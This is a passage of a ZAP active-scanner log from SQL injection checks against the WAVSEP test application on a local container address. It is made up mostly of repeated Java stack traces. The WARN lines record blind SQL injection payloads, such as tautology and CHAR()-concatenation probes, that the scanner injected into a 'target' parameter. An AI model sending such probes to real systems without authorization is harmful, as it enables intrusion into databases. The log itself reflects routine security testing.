Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9686014 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2516=2516) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9686511 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9686528 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9687307 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9687312 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9687957 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9688199 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 4399=5716 AND (7990=7990] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) AND 4399=5716 AND (7990=7990 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688199 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 5412=5412 AND (9392=9392] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) AND 5412=5412 AND (9392=9392 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688200 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 4399=5716 AND (7990=7990] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) AND 4399=5716 AND (7990=7990 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688201 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 3061=4872] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND 3061=4872 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688203 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 6504=6504] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND 6504=6504 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688205 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 3061=4872] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND 3061=4872 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688206 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 7151=6658 AND ('VylD'='VylD] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') AND 7151=6658 AND ('VylD'='VylD at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688207 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 5586=5586 AND ('hIaU'='hIaU] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') AND 5586=5586 AND ('hIaU'='hIaU at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688208 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 7151=6658 AND ('VylD'='VylD] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') AND 7151=6658 AND ('VylD'='VylD at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688209 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 7320=2542 AND 'oOfa'='oOfa] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' AND 7320=2542 AND 'oOfa'='oOfa at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688210 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 5810=5810 AND 'sewz'='sewz] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' AND 5810=5810 AND 'sewz'='sewz at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688211 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 7320=2542 AND 'oOfa'='oOfa] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' AND 7320=2542 AND 'oOfa'='oOfa at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688212 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 7708=4505 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' AND 7708=4505 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688213 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 4671=4671 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' AND 4671=4671 AND '%'=' at 